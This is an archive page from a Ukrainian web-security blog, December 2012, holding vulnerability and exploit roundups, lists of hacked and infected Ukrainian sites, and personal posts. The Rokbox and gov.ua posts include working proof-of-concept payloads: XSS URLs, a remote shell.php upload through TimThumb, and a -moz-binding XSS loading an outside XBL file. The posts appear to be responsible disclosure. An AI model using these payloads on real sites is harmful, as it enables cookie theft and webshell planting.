Архів за Грудень, 2012

Добірка уразливостей

17:24 15.12.2012

В даній добірці уразливості в веб додатках:

  • EMC Cloud Tiering Appliance (CTA) Authentication Bypass Vulnerability (деталі)
  • Multiple vulnerabilities in BabyGekko (деталі)
  • Multiple Vulnerabilities in Smartphone Pentest Framework (SPF) (деталі)
  • Open-Realty CMS 2.5.8 (2.x.x) <= Cross Site Request Forgery (CSRF) Vulnerability (деталі)
  • HP Service Manager and HP Service Center Server, Remote Denial of Service (DoS) (деталі)
  • SysAid Helpdesk Pro Blind SQL Injection (деталі)
  • Squiz CMS File Path Traversal (деталі)
  • SilverStripe CMS - Multiple Vulnerabilities (деталі)
  • Cross-site scripting (XSS) vulnerability in HP Service Manager and HP Service Center (деталі)
  • BugTracker.Net Multiple Security Vulnerabilities (деталі)

Численні уразливості в Rokbox для WordPress

23:58 14.12.2012

24.08.2012

У липні, 28.07.2012, я виявив численні уразливості в плагіні Rokbox для WordPress. Зокрема Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload, Content Spoofing та Information Leakage уразливості. Про що найближчим часом повідомлю розробникам веб додатку.

Раніше я вже писав про уразливості в Rokbox для Joomla та WordPress. Стосовно плагінів для WordPress раніше я писав про уразливості в Organizer.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

14.12.2012

В плагіні Rokbox для WordPress використовуються TimThumb 1.16 та JW Player 4.4.198, тому окрім своїх власних дірок, він має ще дірки цих веб додатків.

На сайтах в основному використовується папка wp_rokbox, але трапляються сайти з папкою rokbox.

XSS (в Rokbox з більш старими версіями TimThumb) (WASC-08):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Та FPD, Abuse of Functionality і DoS в уразливості в TimThumb в усіх версіях Rokbox. А також Arbitrary File Upload уразливість, що була оприлюднена минулого року через 3,5 місяці після оприлюднення мною попередніх дірок.

AFU (WASC-31):

http://site/wp-content/plugins/wp_rokbox/thumb.php?src=http://flickr.com.site.com/shell.php

Content Spoofing (WASC-12):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Information Leakage (WASC-13):

http://site/wp-content/plugins/wp_rokbox/error_log

Full path disclosure (WASC-13):

http://site/wp-content/plugins/wp_rokbox/rokbox.php

До CS і XSS в JW Player і FPD вразливі всі версії Rokbox для WordPress (Rokbox 2.13 і попередні), а от IL та уразливості в TimThumb були виправлені. Після мого повідомлення в серпні розробники замінили TimThumb на phpThumb, тому версія 2.13 невразлива до них.

Похакані сайти №211

22:47 14.12.2012

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://zaira.org.ua (хакером LaMiN3 DK) - 03.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://old.amu.gov.ua (хакером LaMiN3 DK) - 03.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://www.grad.gov.ua (хакерами з SilverT3AM) - 24.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://krovly.com.ua (хакерами з 1923TURK GRUP)
  • http://www.libre.com.ua (хакером CeSaReT 45) - 08.11.2012, зараз сайт вже виправлений адмінами

Добірка експлоітів

20:05 14.12.2012

В даній добірці експлоіти в веб додатках:

  • Ektron 8.02 XSLT Transform Remote Code Execution (деталі)
  • MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day (деталі)
  • MySQL Remote Preauth User Enumeration Zeroday (деталі)
  • FreeFTPD Remote Authentication Bypass Zeroday Exploit (деталі)
  • MySQL (Linux) Heap Based Overrun PoC Zeroday (деталі)

Моя музика: Perception Of Delight

17:22 14.12.2012

Сьогодні вийшов мій новий комерційний реліз - мій альбом “Perception Of Delight”. В даному випадку це EP і це п’ятий комерційний реліз після мого альбому “Narcotic Sound”.

Альбом складається з чотирьох tech-house композицій. Він вже розміщений на Juno Download та багатьох інших онлайн магазинах, де його можна прослухати та придбати (в високій якості). Всі композиції можна прослухати в нормальній якості в моєму акаунті на SoundCloud.

До альбому увійшли 4 композиції, що були створені мною в 2012 році. Це наступні композиції:

  1. Good Mood
  2. Delight (Mix)
  3. Perception
  4. Delight

Уразливості в OSMF та Strobe Media Playback

23:54 13.12.2012

Ще у травні, 04.05.2012, я виявив Content Spoofing уразливості в Open Source Media Framework (OSMF) та Strobe Media Playback. Про що найближчим часом повідомлю розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

Вийшов WordPress 3.5

22:45 13.12.2012

В грудні, 11.12.2012, вийшла нова версія WordPress 3.5.

WordPress 3.5 це перший випуск нової 3.5 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, а також виправлено чимало багів.

Серед головних покращень зокрема можна відзначити покращений аплоадер і менеджер медіа файлів, нова тема Twenty Twelve по замовчуванню та новий вибирач кольору. А також покращені стилі в адмінці, покращена графіка для нових дисплеїв (таких як Retina) та оптимізовані деякі розділи в адмінці.

Окрім покращень для користувачів також були зроблені численні покращення для розробників. Зокрема додане встановлення тегів для вибраних плагінів на wordpress.org, доданий імпортер з Tumblr, додана функція движка switch_to_blog() та JavaScript бібліотеки Underscore і Backbone.

Витік інформації в Internet Explorer

20:03 13.12.2012

Виявлена можливість витоку інформації в Internet Explorer.

Уразливі версії: Microsoft Internet Explorer 6, 7, 8, 9 та 10 для Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8.

Сторінка може відстежити будь-які переміщення мишею, навіть не пов’язані з нею.

  • Information disclosure (mouse tracking) vulnerability in Microsoft Internet Explorer versions 6-10 (деталі)

Уразливості на www.gov.ua

17:20 13.12.2012

25.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting, Brute Force, Cross-Site Request Forgery, Abuse of Functionality та Insufficient Anti-automation уразливості на сайті http://www.gov.ua - “головному” gov.ua домені. Про XSS мені повідомив AmplenuS, а коли я ці дірки перевірив, то знайшов іще BF, CSRF, AoF та IAA дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.12.2012

XSS:

POST запит на сторінці http://www.gov.ua/contact.html (це приклад коду для атаки на Mozilla і Firefox < 3.0, для інших браузерів можливі інші варіанти атакуючого коду).

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')"

В полях: Зворотня адреса, Ваше ПIБ, Доменне ім’я, Текст повідомлення.

Brute Force:

http://www.gov.ua/manager/

Cross-Site Request Forgery:

http://www.gov.ua/manager/

Abuse of Functionality:

В формі логіна http://www.gov.ua/manager/ можна виявляти логіни користувачів (Login enumeration).

Insufficient Anti-automation:

Із-за відсутності захисту від автоматизованих атак в формі логіна, окрім Brute Force атак також можливі автоматизовані атаки на функції логіна (для автоматизованого виявлення логінів) та відновлення паролю (для виявлення емайлів користувачів).

Якщо BF, AoF та IAA уразливості вже виправлені, шляхом обмеження доступу до папки з адмінкою (що не вирішило проблеми з CSRF), то XSS досі не виправлені.

Інфіковані сайти №142

22:46 12.12.2012

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

  • http://veresen.com - інфекція була виявлена 21.10.2012. Зараз сайт не входить до переліку підозрілих.
  • http://stomag.com.ua - інфекція була виявлена 18.10.2012. Зараз сайт не входить до переліку підозрілих.
  • http://bilogorodka.com.ua - інфекція була виявлена 29.11.2012. Зараз сайт входить до переліку підозрілих.
  • http://pbs.net.ua - інфекція була виявлена 10.12.2012. Зараз сайт не входить до переліку підозрілих.
  • http://farba.com.ua - інфекція була виявлена 19.11.2012. Зараз сайт не входить до переліку підозрілих.